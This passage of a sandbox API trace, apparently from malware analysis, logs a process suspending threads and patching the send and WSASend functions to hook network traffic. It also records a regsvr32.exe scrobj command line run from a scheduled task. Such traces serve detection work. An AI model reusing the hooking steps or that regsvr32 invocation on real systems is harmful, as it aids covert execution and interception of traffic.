lpte=0x1fefd3c) returned 1 [0170.380] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.380] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.381] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.381] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.381] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.382] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.382] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.382] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.382] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.383] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.383] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.383] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.383] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.384] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.384] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.384] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.385] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.385] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.385] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.385] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.386] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.386] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.386] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.387] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.387] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.387] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.387] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.388] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.388] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.388] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.431] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x438) returned 0x8c [0170.431] SuspendThread (hThread=0x8c) returned 0x0 [0170.431] CloseHandle (hObject=0x8c) returned 1 [0170.431] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9b8) returned 0x8c [0170.431] SuspendThread (hThread=0x8c) returned 0x0 [0170.431] CloseHandle (hObject=0x8c) returned 1 [0170.457] CloseHandle (hObject=0x88) returned 1 [0170.457] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0170.457] GetProcAddress (hModule=0x75bc0000, lpProcName="send") returned 0x75bc6f01 [0170.457] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x164224 | out: lpflOldProtect=0x164224*=0x20) returned 1 [0170.457] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x170000 [0170.458] RtlMoveMemory (in: Destination=0x170000, Source=0x75bc6f01, Length=0x5 | out: Destination=0x170000) [0170.458] VirtualProtect (in: lpAddress=0x75bc6f01, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x164224 | out: lpflOldProtect=0x164224*=0x40) returned 1 [0170.464] GetModuleHandleA (lpModuleName="ws2_32.dll") returned 0x75bc0000 [0170.464] GetProcAddress (hModule=0x75bc0000, lpProcName="WSASend") returned 0x75bc4406 [0170.464] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x164224 | out: lpflOldProtect=0x164224*=0x20) returned 1 [0170.464] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x180000 [0170.465] RtlMoveMemory (in: Destination=0x180000, Source=0x75bc4406, Length=0x5 | out: Destination=0x180000) [0170.465] VirtualProtect (in: lpAddress=0x75bc4406, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x164224 | out: lpflOldProtect=0x164224*=0x40) returned 1 [0170.469] GetCurrentProcessId () returned 0x320 [0170.469] GetCurrentThreadId () returned 0x980 [0170.469] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0170.471] Thread32First (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.472] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.472] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.472] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.472] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.473] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.473] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.473] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.474] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.474] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.474] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.474] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.475] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.475] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.475] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.475] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.476] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.476] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.476] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.477] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.477] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.477] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.477] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.478] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.478] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.478] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.478] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.479] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.479] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.479] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.480] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.480] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.480] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.480] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.481] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.481] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.481] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.482] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.482] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.482] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.482] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.483] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.483] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.483] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.484] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.484] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.484] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.484] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.485] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.485] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.485] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.486] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.486] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.486] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.486] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.487] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.487] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.487] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.488] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.488] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.488] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.488] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.489] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.489] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.489] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.490] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.490] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.490] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.490] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.491] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.491] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.491] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.492] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.492] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.492] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.492] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.493] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.493] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.493] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.493] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.494] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.494] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.494] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.495] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.495] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.495] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.495] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.496] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.496] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.496] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.497] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.497] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.497] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.497] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.498] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.498] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.498] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.498] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.499] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.499] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.499] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.500] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.500] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.500] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.500] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.501] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.516] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.516] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.516] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.517] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.517] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.517] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.517] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.518] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.518] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.518] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.519] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.519] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.519] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.519] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.520] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.520] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.520] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.521] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.521] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.521] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.521] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.522] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.522] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.522] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.523] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.523] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.523] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.523] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.524] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.524] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.524] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.524] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.525] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.525] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.525] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.526] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.526] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.526] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.526] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.527] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.527] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.527] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.527] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.528] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.528] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.528] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.529] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.529] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.529] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.529] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.530] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.530] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.530] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.531] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.531] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.531] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.531] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.532] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.532] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.542] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.542] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.543] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.543] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.543] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.544] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.544] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.544] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.544] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.545] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.545] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.545] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.546] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.546] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.546] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.546] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.547] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.547] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.547] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.548] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.548] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.548] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.549] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.549] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.549] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.549] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.550] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.550] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.550] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.550] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.551] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.551] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.551] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.552] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.552] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.552] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.552] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.553] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.553] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.553] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.553] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.554] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.554] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.554] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.555] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.555] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.555] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.555] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.556] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.556] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.556] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.557] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.557] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.557] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.557] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.558] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.558] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.558] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.559] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.559] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.559] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.559] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.560] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.560] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.560] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.560] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.561] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.561] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.561] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.562] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.562] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.562] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.562] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.563] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.563] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.632] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.632] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.632] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.633] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.633] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.633] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.633] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.634] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.634] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.634] Thread32Next (hSnapshot=0x88, lpte=0x1fefd3c) returned 1 [0170.650] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x438) returned 0x8c [0170.650] ResumeThread (hThread=0x8c) returned 0x1 [0170.650] CloseHandle (hObject=0x8c) returned 1 [0170.651] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9b8) returned 0x8c [0170.651] ResumeThread (hThread=0x8c) returned 0x1 [0170.651] CloseHandle (hObject=0x8c) returned 1 [0170.684] CloseHandle (hObject=0x88) returned 1 [0170.684] VirtualQuery (in: lpAddress=0x450a78, lpBuffer=0x1fefd30, dwLength=0x1c | out: lpBuffer=0x1fefd30*(BaseAddress=0x450000, AllocationBase=0x430000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0170.684] GetProcessHeap () returned 0x430000 [0170.684] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x450a78 | out: hHeap=0x430000) returned 1 [0170.684] VirtualQuery (in: lpAddress=0x450968, lpBuffer=0x1fefd30, dwLength=0x1c | out: lpBuffer=0x1fefd30*(BaseAddress=0x450000, AllocationBase=0x430000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0170.684] GetProcessHeap () returned 0x430000 [0170.684] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x450968 | out: hHeap=0x430000) returned 1 [0170.684] RtlExitUserThread (Status=0x0) Process: id = "29" image_name = "regsvr32.exe" filename = "c:\\windows\\system32\\regsvr32.exe" page_root = "0x5c678000" os_pid = "0x968" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x790" cmd_line = "C:\\Windows\\system32\\regsvr32.EXE /s /n /u /i:\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jgshctw\" scrobj" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 264 os_tid = 0x964 [0172.024] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x25f8f0 | out: lpSystemTimeAsFileTime=0x25f8f0*(dwLowDateTime=0xe96dbf90, dwHighDateTime=0x1d59514)) [0172.024] GetCurrentProcessId () returned 0x968 [0172.024] GetCurrentThreadId () returned 0x964 [0172.024] GetTickCount () returned 0x116388e [0172.024] QueryPerformanceCounter (in: lpPerformanceCount=0x25f8f8 | out: lpPerformanceCount=0x25f8f8*=29224704819) returned 1 [0172.025] GetStartupInfoW (in: lpStartupInfo=0x25f8a0 | out: lpStartupInfo=0x25f8a0*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1d59514e96dbf90, hStdOutput=0x6cded9b33, hStdError=0x0)) [0172.026] GetModuleHandleW (lpModuleName=0x0) returned 0xff500000 [0172.026] __set_app_type (_Type=0x2) [0172.026] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff502a70) returned 0x0 [0172.026] __wgetmainargs (in: _Argc=0xff504780, _Argv=0xff504790, _Env=0xff504788, _DoWildCard=0, _StartInfo=0xff504010 | out: _Argc=0xff504780, _Argv=0xff504790, _Env=0xff504788) returned 0 [0172.027] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 